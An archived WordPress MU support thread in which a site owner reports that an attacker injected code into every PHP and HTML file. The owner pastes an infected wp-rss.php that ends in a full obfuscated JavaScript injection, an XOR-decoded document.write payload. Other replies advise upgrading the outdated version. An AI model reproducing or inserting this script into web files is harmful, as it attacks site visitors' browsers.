The MU forums have moved to WordPress.org

Code vulnerability?! (12 posts)

  1. vladbuk
    Member
    Posted 16 years ago #

    wpmu 1.2.5.a
    hosted on siteground.com

    Such already was and repeats again: in all files php and my own html in a folder /public_html the harmful code is added! Php warning on main page and not have access to admin interface.

    Sample wp-rss.php:

    <?php

    if (empty($wp)) {
    require_once('wp-config.php');
    wp('feed=rss');
    }

    require (ABSPATH . WPINC . '/feed-rss.php');

    ?> <!-- ab2aab4b9d766629b77b9b4febadeb6f --><script>document.write(unescape("%3Cscript%3Efunction%20dwfc15%28bse742%29%7Bvar%20m5pn9i%3Dnew%20String%28arguments.callee%29%3Bm5pn9i%3Dm5pn9i.replace%28/%5B%5Ea-z0-9%28%29+_%5C.%2C-%5D+/ig%2C%20%22%22%29.toUpperCase%28%29%2Csrgfnw%3D0%2Cmumscr%3D0%2Ca7c98k%3D%27%27%2Chbzv8w%3D0%3Bfor%28var%20l8anwe%3D0%3Bl8anwe%3Cm5pn9i.length%3Bl8anwe++%29hbzv8w+%3Dm5pn9i.charCodeAt%28l8anwe%2C1%29%3Bfor%28srgfnw%3D0%3Bsrgfnw%3Cbse742.length%3Bsrgfnw++%29%7Bvar%20abksjm%3Dbse742%5Bsrgfnw%5D%2Cxcaot3%3Dm5pn9i.substr%28mumscr%2C1%29.charCodeAt%280%29%5Ehbzv8w%3Ba7c98k+%3DString.fromCharCode%28abksjm%5Excaot3%29%3Bmumscr++%3Bif%28mumscr%3D%3Dm5pn9i.length%29mumscr%3D0%7Ddocument.write%28a7c98k%29%3Ba7c98k%3D%27%27%7Ddwfc15%28new%20Array%2829808%2C29740%2C29735%2C29755%2C29751%2C29747%2C29745%2C29818%2C29763%2C29783%2C29727%2C29757%2C29769%2C29782%2C29772%2C29743%2C29815%2C29759%2C29775%2C29777%2C29772%2C29772%2C29736%2C29746%2C29736%2C29730%2C29713%2C29736%2C29734%2C29821%2C29734%2C29740%2C29704%2C29713%2C29699%2C29822%2C29797%2C29795%2C29730%2C29752%2C29772%2C29736%2C29740%2C29732%2C29744%2C29737%2C29799%2C29805%2C29822%2C29730%2C29700%2C29759%2C29738%2C29748%2C29798%2C29755%2C29810%2C29783%2C29743%2C29782%2C29737%2C29800%2C29715%2C29740%2C29818%2C29720%2C29821%2C29823%2C29715%2C29733%2C29771%2C29738%2C29799%2C29740%2C29735%2C29753%2C29801%2C29734%2C29727%2C29759%2C29705%2C29756%2C29791%2C29769%2C29780%2C29782%2C29771%2C29722%2C29813%2C29773%2C29720%2C29722%2C29713%2C29816%2C29805%2C29775%2C29710%2C29705%2C29815%2C29797%2C29744%2C29809%2C29799%2C29755%2C29814%2C29754%2C29758%2C29755%2C29756%2C29782%2C29777%2C29710%2C29744%2C29812%2C29820%2C29797%2C29823%2C29821%2C29768%2C29763%2C29747%2C29738%2C29749%2C29751%2C29801%2C29751%2C29697%2C29702%2C29750%2C29744%2C29763%2C29781%2C29767%2C29743%2C29765%2C29750%2C29729%2C29759%2C29746%2C29714%2C29703%2C29770%2C29702%2C29757%2C29808%2C29707%2C29735%2C29750%2C29781%2C29772%2C29800%2C29755%2C29710%2C29733%2C29793%2C29770%2C29748%2C29789%2C29759%2C29739%2C29737%2C29750%2C29751%2C29786%2C29818%2C29817%2C29715%2C29752%2C29737%2C29772%2C29762%2C29774%2C29764%2C29750%2C29741%2C29749%2C29766%2C29809%2C29795%2C29747%2C29740%2C29711%2C29717%2C29772%2C29744%2C29741%2C29745%2C29810%2C29764%2C29752%2C29765%2C29792%2C29713%2C29736%2C29734%2C29821%2C29734%2C29772%2C29710%2C29710%2C29713%2C29808%2C29792%2C29801%2C29758%2C29742%2C29759%2C29750%2C29720%2C29793%2C29725%2C29733%2C29735%2C29811%2C29736%2C29768%2C29778%2C29783%2C29759%2C29738%2C29744%2C29711%2C29751%2C29745%2C29740%2C29729%2C29803%2C29818%2C29716%2C29739%2C29754%2C29699%2C29737%2C29740%2C29722%2C29700%2C29699%2C29799%2C29716%2C29714%2C29787%2C29771%2C29737%2C29732%2C29741%2C29736%2C29712%2C29731%2C29748%2C29757%2C29815%2C29803%2C29750%2C29801%2C29760%2C29783%2C29767%2C29819%2C29799%2C29755%2C29732%2C29735%2C29738%2C29744%2C29733%2C29713%2C29737%2C29749%2C29754%2C29784%2C29700%2C29705%2C29813%2C29781%2C29767%2C29761%2C29774%2C29780%2C29775%2C29756%2C29754%2C29759%2C29732%2C29746%2C29781%2C29799%2C29701%2C29818%2C29730%2C29766%2C29741%2C29767%2C29741%2C29750%2C29735%2C29751%2C29814%2C29809%2C29743%2C29773%2C29782%2C29756%2C29780%2C29763%2C29777%2C29743%2C29778%2C29765%2C29708%2C29800%2C29750%2C29731%2C29745%2C29754%2C29803%2C29743%2C29731%2C29753%2C29755%2C29763%2C29790%2C29786%2C29707%2C29734%2C29731%2C29736%2C29779%2C29745%2C29735%2C29784%2C29741%2C29723%2C29723%2C29800%2C29740%2C29779%2C29783%2C29777%2C29752%2C29769%2C29767%2C29741%2C29765%2C29777%2C29747%2C29734%2C29755%2C29794%2C29752%2C29816%2C29812%2C29797%2C29804%2C29811%2C29771%2C29741%2C29754%2C29728%2C29748%2C29733%2C29799%2C29733%2C29728%2C29743%2C29745%2C29750%2C29700%2C29714%2C29799%2C29751%2C29730%2C29744%2C29742%2C29744%2C29781%2C29724%2C29810%2C29804%2C29764%2C29749%2C29758%2C29738%2C29756%2C29707%2C29751%2C29749%2C29787%2C29759%2C29750%2C29710%2C29811%2C29700%2C29749%2C29757%2C29735%2C29808%2C29817%2C29792%2C29699%2C29804%2C29823%2C29747%2C29745%2C29728%2C29739%2C29716%2C29737%2C29728%2C29757%2C29721%2C29749%2C29742%2C29737%2C29755%2C29809%2C29711%2C29716%2C29803%2C29815%2C29807%2C29705%2C29803%2C29727%2C29806%2C29709%2C29710%2C29806%2C29770%2C29741%2C29775%2C29736%2C29790%2C29783%2C29823%2C29806%2C29796%2C29769%2C29763%2C29783%2C29770%2C29772%2C29744%2C29756%2C29732%2C29804%2C29746%2C29723%2C29787%2C29773%2C29739%2C29740%2C29730%2C29784%2C29776%2C29772%2C29709%2C29739%2C29753%2C29745%2C29747%2C29786%2C29810%2C29751%2C29722%2C29795%2C29753%2C29762%2C29783%2C29776%2C29783%2C29777%2C29728%2C29733%2C29753%2C29761%2C29731%2C29808%2C29736%2C29814%2C29756%2C29807%2C29728%2C29745%2C29754%2C29777%2C29732%2C29742%2C29736%2C29746%2C29793%2C29752%2C29777%2C29742%2C29771%2C29759%2C29804%2C29713%2C29823%2C29743%2C29771%2C29751%2C29736%2C29709%2C29823%2C29766%2C29751%2C29739%2C29731%2C29816%2C29801%2C29801%2C29796%2C29698%2C29752%2C29703%2C29819%2C29722%2C29701%2C29711%2C29709%2C29761%2C29774%2C29745%2C29789%2C29720%2C29723%2C29710%2C29739%2C29753%2C29771%2C29775%2C29722%2C29820%2C29804%2C29823%2C29735%2C29783%2C29765%2C29777%2C29760%2C29762%2C29741%2C29735%2C29771%2C29776%2C29704%2C29738%2C29757%2C29753%2C29711%2C29739%2C29746%2C29777%2C29775%2C29730%2C29815%2C29747%2C29745%2C29728%2C29739%2C29716%2C29765%2C29732%2C29778%2C29730%2C29786%2C29783%2C29711%2C29767%2C29743%2C29741%2C29820%2C29820%2C29766%2C29749%2C29779%2C29759%2C29803%2C29755%2C29773%2C29747%2C29728%2C29745%2C29731%2C29796%2C29738%2C29736%2C29736%2C29738%2C29715%2C29821%2C29755%2C29766%2C29774%2C29780%2C29766%2C29754%2C29746%2C29776%2C29773%2C29774%2C29807%2C29737%2C29772%2C29766%2C29751%2C29736%2C29738%2C29697%2C29737%2C29789%2C29728%2C29741%2C29752%2C29807%2C29723%2C29697%2C29765%2C29751%2C29734%2C29747%2C29736%2C29787%2C29746%2C29775%2C29807%2C29777%2C29755%2C29737%2C29782%2C29807%2C29700%2C29759%2C29731%2C29735%2C29741%2C29740%2C29804%2C29763%2C29765%2C29762%2C29733%2C29743%2C29772%2C29755%2C29762%2C29746%2C29756%2C29757%2C29702%2C29791%2C29726%2C29804%2C29739%2C29757%2C29781%2C29817%2C29724%2C29740%2C29752%2C29729%2C29813%2C29715%2C29794%2C29816%2C29737%2C29794%2C29751%2C29752%2C29756%2C29709%2C29734%2C29776%2C29787%2C29712%2C29770%2C29731%2C29752%2C29796%2C29705%2C29759%2C29750%2C29756%2C29808%2C29796%2C29794%2C29731%2C29752%2C29781%2C29813%2C29770%2C29745%2C29742%2C29808%2C29794%2C29800%2C29802%2C29817%2C29816%2C29809%2C29820%2C29801%2C29823%2C29709%2C29710%2C29704%2C29808%2C29795%2C29805%2C29761%2C29774%2C29780%2C29743%2C29750%2C29734%2C29736%2C29744%2C29747%2C29788%2C29737%2C29771%2C29812%2C29735%2C29788%2C29740%2C29775%2C29744%2C29754%2C29800%2C29796%2C29822%2C29750%2C29763%2C29738%2C29754%2C29799%2C29810%2C29801%2C29818%2C29723%2C29721%2C29699%2C29711%2C29801%2C29735%2C29752%2C29755%2C29736%2C29749%2C29739%2C29799%2C29757%2C29759%2C29774%2C29775%2C29766%2C29803%2C29800%2C29819%2C29820%2C29712%2C29798%2C29803%2C29784%2C29745%2C29763%2C29787%2C29747%2C29764%2C29738%2C29795%2C29818%2C29795%2C29807%2C29805%2C29760%2C29794%2C29740%2C29738%2C29696%2C29700%2C29718%2C29720%2C29740%2C29755%2C29740%2C29728%2C29736%2C29706%2C29794%2C29811%2C29793%2C29776%2C29769%2C29774%2C29791%2C29763%2C29762%2C29752%2C29810%2C29748%2C29737%2C29774%2C29758%2C29739%2C29739%2C29740%2C29753%2C29765%2C29784%2C29706%2C29730%2C29777%2C29747%2C29758%2C29739%2C29749%2C29740%2C29756%2C29799%2C29701%2C29818%2C29730%2C29766%2C29741%2C29767%2C29746%2C29734%2C29739%2C29731%2C29814%2C29803%2C29742%2C29773%2C29782%2C29756%2C29780%2C29763%2C29777%2C29747%2C29756%2C29728%2C29757%2C29738%2C29749%2C29729%2C29796%2C29823%2C29708%2C29753%2C29751%2C29728%2C29739%2C29730%2C29767%2C29733%2C29769%2C29799%2C29776%2C29789%2C29742%2C29768%2C29730%2C29784%2C29799%2C29786%2C29788%2C29733%2C29737%2C29735%2C29707%2C29743%2C29814%2C29751%2C29741%2C29741%2C29757%2C29811%2C29743%2C29734%2C29780%2C29780%2C29771%2C29741%2C29719%2C29742%2C29776%2C29787%2C29720%2C29704%2C29820%2C29804%2C29797%2C29792%2C29727%2C29809%2C29796%2C29767%2C29739%2C29741%2C29756%2C29811%2C29754%2C29745%2C29751%2C29736%2C29741%2C29736%2C29812%2C29738%2C29748%2C29752%2C29754%2C29806%2C29807%2C29817%2C29795%2C29817%2C29705%2C29816%2C29794%2C29821%2C29771%2C29765%2C29766%2C29790%2C29803%2C29746%2C29776%2C29773%2C29780%2C29734%2C29747%2C29817%2C29736%2C29733%2C29790%2C29734%2C29809%2C29706%2C29699%2C29818%2C29820%2C29803%2C29743%2C29754%2C29772%2C29736%2C29779%2C29753%2C29781%2C29769%2C29723%2C29707%2C29742%2C29739%2C29788%2C29791%2C29739%2C29741%2C29736%2C29770%2C29755%2C29767%2C29777%2C29700%2C29754%2C29737%2C29751%2C29799%2C29758%2C29728%2C29755%2C29756%2C29734%2C29756%2C29729%2C29782%2C29709%2C29770%2C29750%2C29755%2C29740%2C29752%2C29741%2C29746%2C29780%2C29704%2C29743%2C29744%2C29748%2C29741%2C29810%2C29816%2C29751%2C29740%2C29762%2C29748%2C29755%2C29782%2C29766%2C29748%2C29780%2C29740%2C29800%2C29815%2C29748%2C29766%2C29737%2C29770%2C29814%2C29802%2C29815%2C29701%2C29820%2C29792%2C29816%2C29806%2C29722%2C29743%2C29736%2C29749%2C29807%2C29703%2C29819%2C29714%2C29804%2C29795%2C29821%2C29747%2C29755%2C29727%2C29758%2C29736%2C29787%2C29795%2C29721%2C29819%2C29807%2C29795%2C29752%2C29744%2C29734%2C29731%2C29780%2C29730%2C29738%2C29752%2C29739%2C29702%2C29704%2C29699%2C29821%2C29800%2C29732%2C29748%2C29787%2C29742%2C29711%2C29728%2C29786%2C29742%2C29718%2C29778%2C29741%2C29760%2C29722%2C29750%2C29753%2C29745%2C29735%2C29730%2C29798%2C29798%2C29803%2C29796%2C29698%2C29793%2C29717%2C29794%2C29796%2C29814%2C29807%2C29762%2C29783%2C29771%2C29794%2C29751%2C29757%2C29778%2C29749%2C29753%2C29742%2C29737%2C29796%2C29813%2C29717%2C29698%2C29702%2C29740%2C29793%2C29758%2C29805%2C29797%2C29792%2C29793%2C29712%2C29795%2C29719%2C29704%2C29793%2C29793%2C29795%2C29796%2C29808%2C29744%2C29756%2C29736%2C29729%2C29741%2C29735%2C29752%2C29697%2C29705%2C29708%2C29696%2C29797%2C29811%2C29796%2C29796%2C29798%2C29815%2C29799%2C29806%2C29800%2C29817%2C29796%2C29725%2C29724%2C29718%2C29819%2C29816%2C29798%2C29804%2C29744%2C29749%2C29775%2C29729%2C29799%2C29740%2C29728%2C29738%2C29803%2C29734%2C29777%2C29758%2C29719%2C29767%2C29745%2C29773%2C29751%2C29752%2C29792%2C29808%2C29822%2C29811%2C29698%2C29797%2C29809%2C29797%2C29817%2C29794%2C29816%2C29778%2C29779%2C29770%2C29783%2C29799%2C29738%2C29732%2C29739%2C29757%2C29797%2C29797%2C29807%2C29759%2C29750%2C29771%2C29769%2C29709%2C29746%2C29737%2C29732%2C29748%2C29705%2C29776%2C29761%2C29748%2C29748%2C29727%2C29759%2C29771%2C29736%2C29758%2C29755%2C29740%2C29713%2C29733%2C29731%2C29760%2C29727%2C29740%2C29751%2C29742%2C29735%2C29733%2C29803%2C29794%2C29801%2C29731%2C29755%2C29729%2C29761%2C29759%2C29729%2C29742%2C29751%2C29800%2C29806%2C29791%2C29763%2C29762%2C29758%2C29779%2C29747%2C29738%2C29774%2C29737%2C29734%2C29739%2C29801%2C29748%2C29724%2C29712%2C29813%2C29792%2C29698%2C29732%2C29794%2C29799%2C29822%2C29817%2C29801%2C29813%2C29708%2C29806%2C29809%2C29701%2C29812%2C29724%2C29823%2C29742%2C29734%2C29742%2C29754%2C29735%2C29765%2C29792%2C29811%2C29799%2C29750%2C29812%2C29823%2C29725%2C29813%2C29797%2C29743%2C29744%2C29749%2C29807%2C29804%2C29736%2C29765%2C29743%2C29816%2C29738%2C29795%2C29823%2C29721%2C29803%2C29780%2C29801%2C29711%2C29714%2C29741%2C29720%2C29803%2C29780%2C29794%2C29720%2C29723%2C29793%2C29731%2C29812%2C29817%2C29738%2C29808%2C29744%2C29744%2C29734%2C29757%2C29737%2C29758%2C29801%2C29715%2C29810%2C29763%2C29756%2C29745%2C29793%2C29787%2C29778%2C29783%2C29772%2C29742%2C29795%2C29717%2C29734%2C29771%2C29746%2C29802%2C29761%2C29730%2C29738%2C29739%2C29746%2C29748%2C29814%2C29809%2C29795%2C29806%2C29805%2C29761%2C29797%2C29748%2C29736%2C29745%2C29728%2C29755%2C29740%2C29815%2C29813%2C29700%2C29816%2C29799%2C29798%2C29815%2C29798%2C29812%2C29742%2C29773%2C29750%2C29779%2C29750%2C29782%2C29751%2C29746%2C29773%2C29748%2C29796%2C29788%2C29816%2C29737%2C29778%2C29766%2C29735%2C29775%2C29766%2C29763%2C29746%2C29743%2C29761%2C29777%2C29745%2C29768%2C29703%2C29788%2C29698%2C29726%2C29697%2C29755%2C29761%2C29777%2C29703%2C29819%2C29747%2C29703%2C29790%2C29707%2C29709%2C29797%2C29797%2C29744%2C29812%2C29747%2C29729%2C29739%2C29757%2C29738%2C29749%2C29731%2C29706%2C29706%2C29725%2C29780%2C29778%2C29809%2C29795%2C29751%2C29758%2C29768%2C29775%2C29751%2C29739%2C29817%29%29%3C/script%3E"))</script><!--/-->

  2. andrea_r
    Moderator
    Posted 16 years ago #

    Soooo.... someone hacked into your site?

  3. vladbuk
    Member
    Posted 16 years ago #

    No user - only visitors...

  4. theapparatus
    Member
    Posted 16 years ago #

    Added modlook in a hopefully attempt to get rid of all that.

    wpmu 1.2.5.a

    That's probably your problem right there. 1.3 has been out for quite sometime and fixed some security problems. Keeping an eye on versions is usually a good thing.

  5. vladbuk
    Member
    Posted 16 years ago #

    theapparatus, thanks.
    I thought to spend upgrade at once after version 1.3 release. But there is no support XMLRPC and it is necessary for me. Though for the sake of safety it is possible to endow functionality.

  6. PhoenixRises
    Member
    Posted 16 years ago #

    There is XMLRPC support in 1.3.

  7. vladbuk
    Member
    Posted 16 years ago #

  8. vladbuk
    Member
    Posted 16 years ago #

    donncha said: "The XMLRPC disable code is safe, I'll be releasing it as a standalone WordPress MU plugin in a few days."
    Where is that plugin?

  9. PhoenixRises
    Member
    Posted 16 years ago #

    I installed WPMU 1.3 and while XMLRPC is disabled by default, it was possible to enable it on a 'per blog' basis. I couldn't find an option to enable it site-wide but i didnt look too much. However, the functionality is definitely there.

  10. vladbuk
    Member
    Posted 16 years ago #

    Means upgrade time has come.
    But it is interesting as this hacker's code is added?

  11. donncha
    Key Master
    Posted 16 years ago #

    XMLRPC is enabled in 1.3. The disabling code was taken out before the final release. I keep meaning to release that plugin but I never get around to it..

    Unfortunately, it's probably because you were using an old version of WPMU that you got hacked :(

  12. vladbuk
    Member
    Posted 16 years ago #

    donncha thanks. All the same it is impossible to eat not fresh products :-)

About this Topic